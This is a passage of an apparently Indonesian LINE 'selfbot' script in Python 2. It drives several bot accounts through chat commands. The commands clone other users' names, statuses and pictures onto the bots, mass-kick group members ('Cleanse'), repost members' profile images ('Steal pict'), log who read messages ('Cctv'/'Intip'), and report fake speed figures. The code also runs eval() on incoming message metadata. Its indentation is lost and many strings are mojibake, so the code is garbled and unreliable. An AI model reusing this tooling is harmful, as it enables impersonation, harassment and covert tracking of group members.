albums = cl.getAlbum(gid)["result"]["items"]
i = 0
if albums != []:
for album in albums:
cl.deleteAlbum(gid,album["id"])
i += 1
if wait["lang"] == "JP":
cl.sendText(msg.to,str(i) + "Deleted albums")
else:
cl.sendText(msg.to,str(i) + "åˆ é™¤äº†äº‹çš„ç›¸å†Œã€‚")
elif msg.text in ["Group id"]:
gid = cl.getGroupIdsJoined()
h = ""
for i in gid:
h += "[%s]:\n%s\n" % (cl.getGroup(i).name,i)
cl.sendText(msg.to,h)
elif msg.text in ["Cancelall"]:
if msg.from_ in admin:
gid = cl.getGroupIdsInvited()
for i in gid:
cl.rejectGroupInvitation(i)
if wait["lang"] == "JP":
cl.sendText(msg.to,"All invitations have been refused")
else:
cl.sendText(msg.to,"拒�了全部的邀请。")
elif "album removeat’" in msg.text:
gid = msg.text.replace("album removeat’","")
albums = cl.getAlbum(gid)["result"]["items"]
i = 0
if albums != []:
for album in albums:
cl.deleteAlbum(gid,album["id"])
i += 1
if wait["lang"] == "JP":
cl.sendText(msg.to,str(i) + "Albums deleted")
else:
cl.sendText(msg.to,str(i) + "åˆ é™¤äº†äº‹çš„ç›¸å†Œã€‚")
elif msg.text in ["è‡ªå‹•è¿½åŠ :オン","Add on","Auto add:on","è‡ªå‹•è¿½åŠ ï¼šé–‹"]:
if msg.from_ in admin:
if wait["autoAdd"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"already on")
else:
cl.sendText(msg.to,"Done")
else:
wait["autoAdd"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Done")
else:
cl.sendText(msg.to,"�了开。")
elif msg.text in ["è‡ªå‹•è¿½åŠ :オフ","Add off","Auto add:off","è‡ªå‹•è¿½åŠ ï¼šé—œ"]:
if msg.from_ in admin:
if wait["autoAdd"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"already off")
else:
cl.sendText(msg.to,"done")
else:
wait["autoAdd"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"done")
else:
cl.sendText(msg.to,"è¦�了关æ–。")
elif "Message change: " in msg.text:
wait["message"] = msg.text.replace("Message change: ","")
cl.sendText(msg.to,"message changed")
elif "Message add: " in msg.text:
wait["message"] = msg.text.replace("Message add: ","")
if wait["lang"] == "JP":
cl.sendText(msg.to,"message changed")
else:
cl.sendText(msg.to,"done。")
elif msg.text in ["Message","è‡ªå‹•è¿½åŠ å•�候語確èª�"]:
if wait["lang"] == "JP":
cl.sendText(msg.to,"message change to\n\n" + wait["message"])
else:
cl.sendText(msg.to,"The automatic appending information is set as follows。\n\n" + wait["message"])
elif "Comment:" in msg.text:
c = msg.text.replace("Comment:","")
if c in [""," ","\n",None]:
cl.sendText(msg.to,"message changed")
else:
wait["comment"] = c
cl.sendText(msg.to,"changed\n\n" + c)
elif "Add comment:" in msg.text:
c = msg.text.replace("Add comment:","")
if c in [""," ","\n",None]:
cl.sendText(msg.to,"String that can not be changed")
else:
wait["comment"] = c
cl.sendText(msg.to,"changed\n\n" + c)
#-----------------------------------------------
elif msg.text in ["Backup:on"]:
if msg.from_ in admin:
if wait["Backup"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"backup has been active\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"backup has been enable\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
wait["Backup"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"backup has been active\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"backup has been enable\n\n"+ datetime.today().strftime('%H:%M:%S'))
elif msg.text in ["Backup:off"]:
if msg.from_ in admin:
if wait["Backup"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"backup has been unactive\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"backup has been desable\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
wait["Backup"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"backup has been unactive\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"backup has been desable\n\n"+ datetime.today().strftime('%H:%M:%S'))
elif msg.text in ["Rejectall"]:
if msg.from_ in admin:
gid = cl.getGroupIdsInvited()
for i in gid:
cl.rejectGroupInvitation(i)
if wait["lang"] == "JP":
cl.sendText(msg.to,"All Invites has been Rejected")
else:
cl.sendText(msg.to,"拒绝了全部的邀请。")
	#---------------------Invite owner into a group by id------
elif "Anu: " in msg.text:
if msg.from_ in owner:
gid = msg.text.replace("Anu: ","")
if gid == "":
cl.sendText(msg.to,"Invalid group id")
else:
try:
cl.findAndAddContactsByMid(msg.from_)
cl.inviteIntoGroup(gid,[msg.from_])
except:
cl.sendText(msg.to,"Mungkin saya tidak di dalaam grup itu")
#--------===---====--------------
elif msg.text in ["コメント:オン","Comment on","Comment:on","自動首é �留言:開"]:
if msg.from_ in admin:
if wait["commentOn"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"done")
else:
cl.sendText(msg.to,"already on")
else:
wait["commentOn"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"done")
else:
cl.sendText(msg.to,"�了开。")
elif msg.text in ["コメント:オフ","Comment off","comment off","自動首é �留言:關"]:
if wait["commentOn"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"done")
else:
cl.sendText(msg.to,"already off")
else:
wait["commentOn"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"done")
else:
cl.sendText(msg.to,"è¦�了关æ–。")
elif msg.text in ["Comment","留言確�"]:
cl.sendText(msg.to,"message changed to\n\n" + str(wait["comment"]))
elif msg.text in ["Gurl"]:
if msg.from_ in admin:
if msg.toType == 2:
x = cl.getGroup(msg.to)
if x.preventJoinByTicket == True:
x.preventJoinByTicket = False
cl.updateGroup(x)
gurl = cl.reissueGroupTicket(msg.to)
cl.sendText(msg.to,"line://ti/g/" + gurl)
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Can't be used outside the group")
else:
cl.sendText(msg.to,"Not for use less than group")
elif msg.text in ["Cv1 gurl"]:
if msg.toType == 2:
x = cl.getGroup(msg.to)
if x.preventJoinByTicket == True:
x.preventJoinByTicket = False
ki.updateGroup(x)
gurl = ki.reissueGroupTicket(msg.to)
ki.sendText(msg.to,"line://ti/g/" + gurl)
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Can't be used outside the group")
else:
cl.sendText(msg.to,"Not for use less than group")
elif msg.text in ["Cv2 gurl"]:
if msg.toType == 2:
x = cl.getGroup(msg.to)
if x.preventJoinByTicket == True:
x.preventJoinByTicket = False
kk.updateGroup(x)
gurl = kk.reissueGroupTicket(msg.to)
kk.sendText(msg.to,"line://ti/g/" + gurl)
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Can't be used outside the group")
else:
cl.sendText(msg.to,"Not for use less than group")
elif msg.text in ["Cv3 gurl"]:
if msg.toType == 2:
x = cl.getGroup(msg.to)
if x.preventJoinByTicket == True:
x.preventJoinByTicket = False
kc.updateGroup(x)
gurl = kc.reissueGroupTicket(msg.to)
kc.sendText(msg.to,"line://ti/g/" + gurl)
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Can't be used outside the group")
else:
cl.sendText(msg.to,"Not for use less than group")
elif msg.text in ["Comment bl "]:
wait["wblack"] = True
cl.sendText(msg.to,"add to comment bl")
elif msg.text in ["Comment wl "]:
wait["dblack"] = True
cl.sendText(msg.to,"wl to comment bl")
elif msg.text in ["Comment bl confirm"]:
if wait["commentBlack"] == {}:
cl.sendText(msg.to,"confirmed")
else:
cl.sendText(msg.to,"Blacklist")
mc = ""
for mi_d in wait["commentBlack"]:
mc += "" +cl.getContact(mi_d).displayName + "\n"
cl.sendText(msg.to,mc)
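	# Clock feature: while wait["clock"] is on, bot 4 (kc) appends the current HH:MM to its
	# display name; wait["cName4"] holds the base name and "Jam Update" refreshes the suffix.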
	#-------------Clock (Jam) on/off function: start-------------------#
elif msg.text in ["Jam on"]:
if msg.from_ in admin:
if wait["clock"] == True:
kc.sendText(msg.to,"Bot 4 jam on")
else:
wait["clock"] = True
now2 = datetime.now()
nowT = datetime.strftime(now2,"(%H:%M)")
profile = kc.getProfile()
profile.displayName = wait["cName4"] + nowT
kc.updateProfile(profile)
kc.sendText(msg.to,"Jam Selalu On")
elif msg.text in ["Jam off"]:
if msg.from_ in admin:
if wait["clock"] == False:
kc.sendText(msg.to,"Bot 4 jam off")
else:
wait["clock"] = False
kc.sendText(msg.to,"Jam Sedang Off")
	#-------------Clock (Jam) on/off function: end-------------------#
	#-------------Change Clock function: start------------------#
elif msg.text in ["Change clock"]:
n = msg.text.replace("Change clock","")
if len(n.decode("utf-8")) > 13:
cl.sendText(msg.to,"changed")
else:
wait["cName"] = n
cl.sendText(msg.to,"changed to\n\n" + n)
	#-------------Change Clock function: end-----------------#
	#-------------Jam Update function: start---------------------#
elif msg.text in ["Jam Update"]:
if wait["clock"] == True:
now2 = datetime.now()
nowT = datetime.strftime(now2,"(%H:%M)")
profile = kc.getProfile()
profile.displayName = wait["cName4"] + nowT
kc.updateProfile(profile)
kc.sendText(msg.to,"Sukses update")
else:
kc.sendText(msg.to,"Aktifkan jam terlebih dulu")
	#-------------Jam Update function: end-------------------#
#========================================
elif "Steal cover @" in msg.text:
if msg.from_ in admin:
print "[Command]dp executing"
_name = msg.text.replace("Steal cover @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to,"Contact not found")
else:
for target in targets:
try:
contact = cl.getContact(target)
cu = cl.channel.getCover(target)
path = str(cu)
cl.sendImageWithURL(msg.to, path)
except:
pass
print "[Command]dp executed"
elif "Midpict:" in msg.text:
if msg.from_ in admin:
umid = msg.text.replace("Midpict:","")
contact = cl.getContact(umid)
try:
image = "http://dl.profile.line-cdn.net/" + contact.pictureStatus
except:
image = "https://www.1and1.co.uk/digitalguide/fileadmin/DigitalGuide/Teaser/not-found-t.jpg"
try:
cl.sendImageWithURL(msg.to,image)
except Exception as error:
cl.sendText(msg.to,(error))
pass
elif "Steal pict " in msg.text:
if msg.from_ in admin:
if msg.toType == 2:
msg.contentType = 0
steal0 = msg.text.replace("Steal pict ","")
steal1 = steal0.lstrip()
steal2 = steal1.replace("@","")
steal3 = steal2.rstrip()
_name = steal3
group = cl.getGroup(msg.to)
targets = []
for g in group.members:
if _name == g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to,"not found")
else:
for target in targets:
try:
contact = cl.getContact(target)
try:
image = "http://dl.profile.line-cdn.net/" + contact.pictureStatus
except:
image = "https://www.1and1.co.uk/digitalguide/fileadmin/DigitalGuide/Teaser/not-found-t.jpg"
try:
cl.sendImageWithURL(msg.to,image)
except Exception as error:
cl.sendText(msg.to,(error))
pass
except:
cl.sendText(msg.to,"Error!")
break
else:
cl.sendText(msg.to,"Tidak bisa dilakukan di luar grup")
#===============================================
#===============================================
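	# Speed commands: most of these just sleep for a fixed time and report it ("speed palsu" =
	# fake speed); only "Sp asli" and "Speedbot" time a real sendText call to estimate latency.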
elif msg.text in ["debug speed","Debug speed"]:
if msg.from_ in admin:
cl.sendText(msg.to, "Measuring...")
start = time.time()
time.sleep(0.0001)
elapsed_time = time.time() - start
cl.sendText(msg.to, "%sseconds" % (elapsed_time))
print "[Command]Speed palsu executed"
elif msg.text in ["zzz","Bot speed"]:
if msg.from_ in admin:
cl.sendText(msg.to, "Measuring...")
start = time.time()
time.sleep(0.00009)
elapsed_time = time.time() - start
cl.sendText(msg.to, "%sseconds" % (elapsed_time))
print "[Command]Speed palsu executed"
elif "Speed respon" in msg.text:
if msg.from_ in admin:
print("Speed respon")
cl.sendText(msg.to, "Measuring...")
start = time.time()
time.sleep(0.0001)
elapsed_time = time.time() - start
cl.sendText(msg.to, "%sseconds" % (elapsed_time))
print "[Command]Speed palsu executed"
elif "kurangin" in msg.text:
if msg.from_ in admin:
cl.sendText(msg.to, "Sek lurr")
start = time.time()
time.sleep(0.02)
elapsed_time = time.time() - start
cl.sendText(msg.to, "%sseconds" % (elapsed_time))
print "[Command]Speed palsu executed"
elif "Rusakin" in msg.text:
if msg.from_ in admin:
cl.sendText(msg.to, "Sek lurr")
start = time.time()
time.sleep(0.1)
elapsed_time = time.time() - start
cl.sendText(msg.to, "%sseconds" % (elapsed_time))
print "[Command]Speed palsu executed"
elif "Tambah" in msg.text:
if msg.from_ in admin:
cl.sendText(msg.to, "Sek lurr")
start = time.time()
time.sleep(0.5)
elapsed_time = time.time() - start
cl.sendText(msg.to, "%sseconds" % (elapsed_time))
print "[Command]Speed palsu executed"
elif "Spbot" in msg.text:
if msg.from_ in admin:
time.sleep(0.5)
cl.sendText(msg.to, "Sek lurr")
start = time.time()
time.sleep(2.32)
elapsed_time = time.time() - start
cl.sendText(msg.to, "%sseconds" % (elapsed_time))
print "[Command]Speed palsu executed"
elif msg.text in ["Sp asli"]:
if msg.from_ in admin:
print("Sp asli")
start = time.time()
cl.sendText(msg.to, "Sek")
elapsed_time = time.time() - start
cl.sendText(msg.to, "%sseconds" % (elapsed_time))
print "[Command]Speed asli executed"
elif msg.text in ["Speedbot","speedbot"]:
if msg.from_ in admin:
print("Speedbot")
start = time.time()
cl.sendText(msg.to, "loading...................")
elapsed_time = time.time() - start
cl.sendText(msg.to, "%sseconds" % (elapsed_time))
ki.sendText(msg.to, "%sseconds" % (elapsed_time))
kk.sendText(msg.to, "%sseconds" % (elapsed_time))
kc.sendText(msg.to, "%sseconds" % (elapsed_time))
ks.sendText(msg.to, "%sseconds" % (elapsed_time))
k1.sendText(msg.to, "%sseconds" % (elapsed_time))
#========================================
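	# "BotN backup run": snapshot that account's display name, status message and picture-status
	# value into small text files; the matching "BotN backup" handlers below restore from them.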
elif msg.text in ["Bot1 backup run"]:
if msg.from_ in admin:
wek = cl.getContact(mid)
a = wek.pictureStatus
r = wek.displayName
i = wek.statusMessage
s = open('mydn.txt',"w")
s.write(r)
s.close()
t = open('mysm.txt',"w")
t.write(i)
t.close()
u = open('myps.txt',"w")
u.write(a)
u.close()
cl.sendText(msg.to, "backup has been active")
print wek
print a
print r
print i
elif msg.text in ["Bot2 backup run"]:
if msg.from_ in admin:
wek = ki.getContact(Amid)
a = wek.pictureStatus
r = wek.displayName
i = wek.statusMessage
s = open('mgydn.txt',"w")
s.write(r)
s.close()
t = open('myesm.txt',"w")
t.write(i)
t.close()
u = open('mypfs.txt',"w")
u.write(a)
u.close()
ki.sendText(msg.to, "backup has been active")
print wek
print a
print r
print i
elif msg.text in ["Bot3 backup run"]:
if msg.from_ in admin:
wek = kk.getContact(Bmid)
a = wek.pictureStatus
r = wek.displayName
i = wek.statusMessage
s = open('msgydn.txt',"w")
s.write(r)
s.close()
t = open('mysfdgm.txt',"w")
t.write(i)
t.close()
u = open('gymyps.txt',"w")
u.write(a)
u.close()
kk.sendText(msg.to, "backup has been active")
print wek
print a
print r
print i
elif msg.text in ["Bot4 backup run"]:
if msg.from_ in admin:
wek = kc.getContact(Cmid)
a = wek.pictureStatus
r = wek.displayName
i = wek.statusMessage
s = open('jhmydn.txt',"w")
s.write(r)
s.close()
t = open('myhfsm.txt',"w")
t.write(i)
t.close()
u = open('mypfhs.txt',"w")
u.write(a)
u.close()
kc.sendText(msg.to, "backup has been active")
print wek
print a
print r
print i
elif msg.text in ["Bot5 backup run"]:
if msg.from_ in admin:
wek = ks.getContact(Dmid)
a = wek.pictureStatus
r = wek.displayName
i = wek.statusMessage
s = open('madydn.txt',"w")
s.write(r)
s.close()
t = open('mysgjm.txt',"w")
t.write(i)
t.close()
u = open('myrdps.txt',"w")
u.write(a)
u.close()
ks.sendText(msg.to, "backup has been active")
print wek
print a
print r
print i
elif msg.text in ["Bot6 backup run"]:
if msg.from_ in admin:
wek = k1.getContact(Emid)
a = wek.pictureStatus
r = wek.displayName
i = wek.statusMessage
s = open('mydnsgv.txt',"w")
s.write(r)
s.close()
t = open('jhmysm.txt',"w")
t.write(i)
t.close()
u = open('myiyps.txt',"w")
u.write(a)
u.close()
k1.sendText(msg.to, "backup has been active")
print wek
print a
print r
print i
#----------------------------------------------
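	# "BotN clone @user": copy the mentioned user's display name, status message and
	# picture-status value onto the corresponding bot account's profile.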
elif "Bot1 clone " in msg.text:
if msg.from_ in admin:
targets = []
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
contact = cl.getContact(target)
X = contact.displayName
profile = cl.getProfile()
profile.displayName = X
cl.updateProfile(profile)
cl.sendText(msg.to, "Success...")
#---------------------------------------
Y = contact.statusMessage
lol = cl.getProfile()
lol.statusMessage = Y
cl.updateProfile(lol)
#---------------------------------------
P = contact.pictureStatus
cl.updateProfilePicture(P)
except Exception as e:
cl.sendText(msg.to, "Failed!")
print e
elif "Bot2 clone " in msg.text:
if msg.from_ in admin:
targets = []
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
contact = ki.getContact(target)
X = contact.displayName
profile = ki.getProfile()
profile.displayName = X
ki.updateProfile(profile)
ki.sendText(msg.to, "Success...")
#---------------------------------------
Y = contact.statusMessage
lol = ki.getProfile()
lol.statusMessage = Y
ki.updateProfile(lol)
#---------------------------------------
P = contact.pictureStatus
ki.updateProfilePicture(P)
except Exception as e:
ki.sendText(msg.to, "Failed!")
print e
elif "Bot3 clone " in msg.text:
if msg.from_ in admin:
targets = []
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
contact = kk.getContact(target)
X = contact.displayName
profile = kk.getProfile()
profile.displayName = X
kk.updateProfile(profile)
kk.sendText(msg.to, "Success...")
#---------------------------------------
Y = contact.statusMessage
lol = kk.getProfile()
lol.statusMessage = Y
kk.updateProfile(lol)
#---------------------------------------
P = contact.pictureStatus
kk.updateProfilePicture(P)
except Exception as e:
kk.sendText(msg.to, "Failed!")
print e
elif "Bot4 clone " in msg.text:
if msg.from_ in admin:
targets = []
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
contact = kc.getContact(target)
X = contact.displayName
profile = kc.getProfile()
profile.displayName = X
kc.updateProfile(profile)
kc.sendText(msg.to, "Success...")
#---------------------------------------
Y = contact.statusMessage
lol = kc.getProfile()
lol.statusMessage = Y
kc.updateProfile(lol)
#---------------------------------------
P = contact.pictureStatus
kc.updateProfilePicture(P)
except Exception as e:
kc.sendText(msg.to, "Failed!")
print e
elif "Bot5 clone " in msg.text:
if msg.from_ in admin:
targets = []
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
contact = ks.getContact(target)
X = contact.displayName
profile = ks.getProfile()
profile.displayName = X
ks.updateProfile(profile)
ks.sendText(msg.to, "Success...")
#---------------------------------------
Y = contact.statusMessage
lol = ks.getProfile()
lol.statusMessage = Y
ks.updateProfile(lol)
#---------------------------------------
P = contact.pictureStatus
ks.updateProfilePicture(P)
except Exception as e:
ks.sendText(msg.to, "Failed!")
print e
elif "Bot6 clone " in msg.text:
if msg.from_ in admin:
targets = []
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
contact = k1.getContact(target)
X = contact.displayName
profile = k1.getProfile()
profile.displayName = X
k1.updateProfile(profile)
k1.sendText(msg.to, "Success...")
#---------------------------------------
Y = contact.statusMessage
lol = k1.getProfile()
lol.statusMessage = Y
k1.updateProfile(lol)
#---------------------------------------
P = contact.pictureStatus
k1.updateProfilePicture(P)
except Exception as e:
k1.sendText(msg.to, "Failed!")
print e
#=================================================
elif "Bot1 backup" in msg.text:
if msg.from_ in admin:
try:
h = open('mydn.txt',"r")
name = h.read()
h.close()
x = name
profile = cl.getProfile()
profile.displayName = x
cl.updateProfile(profile)
i = open('mysm.txt',"r")
sm = i.read()
i.close()
y = sm
cak = cl.getProfile()
cak.statusMessage = y
cl.updateProfile(cak)
j = open('myps.txt',"r")
ps = j.read()
j.close()
p = ps
cl.updateProfilePicture(p)
cl.sendText(msg.to, "Succes")
except Exception as e:
cl.sendText(msg.to,"Gagagl!")
print e
elif "Bot2 backup" in msg.text:
if msg.from_ in admin:
try:
h = open('mgydn.txt',"r")
name = h.read()
h.close()
x = name
profile = ki.getProfile()
profile.displayName = x
ki.updateProfile(profile)
i = open('myesm.txt',"r")
sm = i.read()
i.close()
y = sm
cak = ki.getProfile()
cak.statusMessage = y
ki.updateProfile(cak)
j = open('mypfs.txt',"r")
ps = j.read()
j.close()
p = ps
ki.updateProfilePicture(p)
ki.sendText(msg.to, "Succes")
except Exception as e:
ki.sendText(msg.to,"Gagagl!")
print e
elif "Bot3 backup" in msg.text:
if msg.from_ in admin:
try:
h = open('msgydn.txt',"r")
name = h.read()
h.close()
x = name
profile = kk.getProfile()
profile.displayName = x
kk.updateProfile(profile)
i = open('mysfdgm.txt',"r")
sm = i.read()
i.close()
y = sm
cak = kk.getProfile()
cak.statusMessage = y
kk.updateProfile(cak)
j = open('gymyps.txt',"r")
ps = j.read()
j.close()
p = ps
kk.updateProfilePicture(p)
kk.sendText(msg.to, "Succes")
except Exception as e:
kk.sendText(msg.to,"Gagagl!")
print e
elif "Bot4 backup" in msg.text:
if msg.from_ in admin:
try:
h = open('jhmydn.txt',"r")
name = h.read()
h.close()
x = name
profile = kc.getProfile()
profile.displayName = x
kc.updateProfile(profile)
i = open('myhfsm.txt',"r")
sm = i.read()
i.close()
y = sm
cak = kc.getProfile()
cak.statusMessage = y
kc.updateProfile(cak)
j = open('mypfhs.txt',"r")
ps = j.read()
j.close()
p = ps
kc.updateProfilePicture(p)
kc.sendText(msg.to, "Succes")
except Exception as e:
kc.sendText(msg.to,"Gagagl!")
print e
elif "Bot5 backup" in msg.text:
if msg.from_ in admin:
try:
h = open('madydn.txt',"r")
name = h.read()
h.close()
x = name
profile = ks.getProfile()
profile.displayName = x
ks.updateProfile(profile)
i = open('mysgjm.txt',"r")
sm = i.read()
i.close()
y = sm
cak = ks.getProfile()
cak.statusMessage = y
ks.updateProfile(cak)
j = open('myrdps.txt',"r")
ps = j.read()
j.close()
p = ps
ks.updateProfilePicture(p)
ks.sendText(msg.to, "Succes")
except Exception as e:
ks.sendText(msg.to,"Gagagl!")
print e
elif "Bot6 backup" in msg.text:
if msg.from_ in admin:
try:
h = open('mydnsgv.txt',"r")
name = h.read()
h.close()
x = name
profile = k1.getProfile()
profile.displayName = x
k1.updateProfile(profile)
i = open('jhmysm.txt',"r")
sm = i.read()
i.close()
y = sm
cak = k1.getProfile()
cak.statusMessage = y
k1.updateProfile(cak)
j = open('myiyps.txt',"r")
ps = j.read()
j.close()
p = ps
k1.updateProfilePicture(p)
k1.sendText(msg.to, "Succes")
except Exception as e:
k1.sendText(msg.to,"Gagagl!")
print e
#=================================================
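# --- Sider / CCTV ---
# Perintah "Sider"/"Cctv" menyimpan read point (msg.id) untuk room ini; event op.type == 55
# di bagian bawah mencatat nama member yang membaca chat setelah titik itu, lalu
# "Ciduk"/"Intip" menampilkan daftarnya.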
elif msg.text == "Sider":
if msg.from_ in admin:
cl.sendText(msg.to, "CCTV sedang di proses......")
try:
del wait2['readPoint'][msg.to]
del wait2['readMember'][msg.to]
except:
pass
now2 = datetime.now()
wait2['readPoint'][msg.to] = msg.id
wait2['readMember'][msg.to] = ""
wait2['setTime'][msg.to] = datetime.strftime(now2,"%H:%M")
wait2['ROM'][msg.to] = {}
#print wait2
elif msg.text == "Ciduk":
if msg.from_ in admin:
if msg.to in wait2['readPoint']:
if wait2["ROM"][msg.to].items() == []:
chiya = ""
else:
chiya = ""
for rom in wait2["ROM"][msg.to].items():
#print rom
chiya += rom[1] + "\n"
cl.sendText(msg.to, "||Di Read Oleh||%s\n||By : By babang adhi\n\n>Pelaku CCTV<\n%s-=CCTV=-[%s]" % (wait2['readMember'][msg.to],chiya,setTime[msg.to]))
else:
cl.sendText(msg.to, "Ketik Cctv dulu Oneng")
elif msg.text == "Cctv":
if msg.from_ in admin:
cl.sendText(msg.to, "Siap di intip....")
try:
del wait2['readPoint'][msg.to]
del wait2['readMember'][msg.to]
except:
pass
now2 = datetime.now()
wait2['readPoint'][msg.to] = msg.id
wait2['readMember'][msg.to] = ""
wait2['setTime'][msg.to] = datetime.strftime(now2,'%Y-%m-%d %H:%M:%S')
wait2['ROM'][msg.to] = {}
print "[Command] Reset"
elif msg.text == "Intip":
if msg.from_ in admin:
if msg.to in wait2['readPoint']:
if wait2["ROM"][msg.to].items() == []:
chiya = ""
else:
chiya = ""
for rom in wait2["ROM"][msg.to].items():
print "[Command] Check"
chiya += rom[1] + "\n"
cl.sendText(msg.to, "✔ ✰ TEAM BONDS KILLS ✰\nRead : %s\n\n✖ Sider :\n%s\nPoint creation date n time:\n[%s]" % (wait2['readMember'][msg.to],chiya,setTime[msg.to]))
try:
del wait2['readPoint'][msg.to]
del wait2['readMember'][msg.to]
except:
pass
wait2['readPoint'][msg.to] = msg.id
wait2['readMember'][msg.to] = ""
now2 = datetime.now()
wait2['setTime'][msg.to] = datetime.strftime(now2,'%Y-%m-%d %H:%M:%S')
wait2['ROM'][msg.to] = {}
print "[Command] reset"
else:
cl.sendText(msg.to,"Read point tidak tersedia, Silahkan ketik Cctv untuk membuat Read point.")
#-----------------------------------------------
#---------------FUNGSI RATAIN GRUP TANPA KICK SESAMA BOT/Admin/Bots----------#
elif "Cleanse" in msg.text:
if msg.from_ in admin:
if msg.toType == 2:
print "ok cleanse"
_name = msg.text.replace("Cleanse","")
gs = ki.getGroup(msg.to)
gs = kk.getGroup(msg.to)
gs = kc.getGroup(msg.to)
cl.sendText(msg.to,"Just some casual cleansing ")
targets = []
for g in gs.members:
if _name in g.displayName:
targets.append(g.mid)
if targets == []:
ki.sendText(msg.to,"you are not admin")
else:
for target in targets:
if not target in Bots:
if not target in admin:
try:
klist=[ki,kk,kc,ks,k1]
kicker=random.choice(klist)
kicker.kickoutFromGroup(msg.to,[target])
print (msg.to,[g.mid])
except:
cl.sendText(msg.to,"Group cleanse")
#-----------------------------------------------
#----------------Fungsi Join Group Start-----------------------#
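# Cara kerja join: preventJoinByTicket dibuka, ticket grup diterbitkan, semua bot masuk
# lewat acceptGroupInvitationByTicket, lalu ticket dikunci kembali.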
elif msg.text in ["Join","Masuk"]: #Panggil Semua Bot
if msg.from_ in admin:
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = False
cl.updateGroup(G)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
ki.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.01)
kk.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.01)
kc.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.01)
ks.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.01)
k1.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.01)
k2.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.01)
k3.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.01)
k4.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.01)
k5.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.01)
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = True
cl.updateGroup(G)
print "Semua Sudah Lengkap"
elif msg.text in ["Kampret join"]:
if msg.from_ in admin:
x = ki.getGroup(msg.to)
x.preventJoinByTicket = False
ki.updateGroup(x)
invsend = 0
Ti = ki.reissueGroupTicket(msg.to)
cl.acceptGroupInvitationByTicket(msg.to,Ti)
G = ki.getGroup(msg.to)
G.preventJoinByTicket = True
ki.updateGroup(G)
Ticket = ki.reissueGroupTicket(msg.to)
elif msg.text in ["Luffy join"]:
if msg.from_ in admin:
x = cl.getGroup(msg.to)
x.preventJoinByTicket = False
cl.updateGroup(x)
invsend = 0
Ti = cl.reissueGroupTicket(msg.to)
ki.acceptGroupInvitationByTicket(msg.to,Ti)
G = cl.getGroup(msg.to)
G.preventJoinByTicket = True
cl.updateGroup(G)
Ticket = cl.reissueGroupTicket(msg.to)
elif msg.text in ["Zorro join"]:
if msg.from_ in admin:
x = cl.getGroup(msg.to)
x.preventJoinByTicket = False
cl.updateGroup(x)
invsend = 0
Ti = cl.reissueGroupTicket(msg.to)
kk.acceptGroupInvitationByTicket(msg.to,Ti)
G = cl.getGroup(msg.to)
G.preventJoinByTicket = True
cl.updateGroup(G)
Ticket = cl.reissueGroupTicket(msg.to)
elif msg.text in ["Sanji Join"]:
if msg.from_ in admin:
X = cl.getGroup(msg.to)
X.preventJoinByTicket = False
cl.updateGroup(X)
invsend = 0
Ti = cl.reissueGroupTicket(msg.to)
kc.acceptGroupInvitationByTicket(msg.to,Ti)
G = cl.getGroup(msg.to)
G.preventJoinByTicket = True
cl.updateGroup(G)
Ticket = cl.reissueGroupTicket(msg.to)
#----------------------Fungsi Join Group Finish---------------#
#-------------Fungsi Leave Group Start---------------#
elif msg.text in ["Balik all"]: #Bot Ninggalin Group termasuk Bot Induk
if msg.from_ in admin:
if msg.toType == 2:
ginfo = cl.getGroup(msg.to)
try:
ki.leaveGroup(msg.to)
kk.leaveGroup(msg.to)
kc.leaveGroup(msg.to)
ks.leaveGroup(msg.to)
